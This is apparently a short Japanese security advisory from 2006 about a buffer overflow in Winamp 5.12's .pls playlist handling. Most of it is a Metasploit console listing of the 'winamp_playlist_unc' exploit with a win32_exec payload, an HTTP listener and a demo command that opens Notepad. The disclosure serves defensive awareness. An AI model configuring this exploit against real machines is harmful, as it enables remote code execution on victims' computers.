Winampのプレイリスト(.pls)に buffer overflow の問題があり、任意のコマンドが実行可能
2006/01/30 公開
msf winamp_playlist_unc(win32_exec) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- -------- ------- -------------------------------------------
optional REALHOST External address to use for redirects (NAT)
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port
Payload: Name Default Description
-------- -------- ---------------------------- ------------------------------------------
required EXITFUNC process Exit technique: "process", "thread", "seh"
required CMD cmd.exe /c start notepad.exe The command string to execute
Target: Winamp 5.12 Universal
msf winamp_playlist_unc(win32_exec) >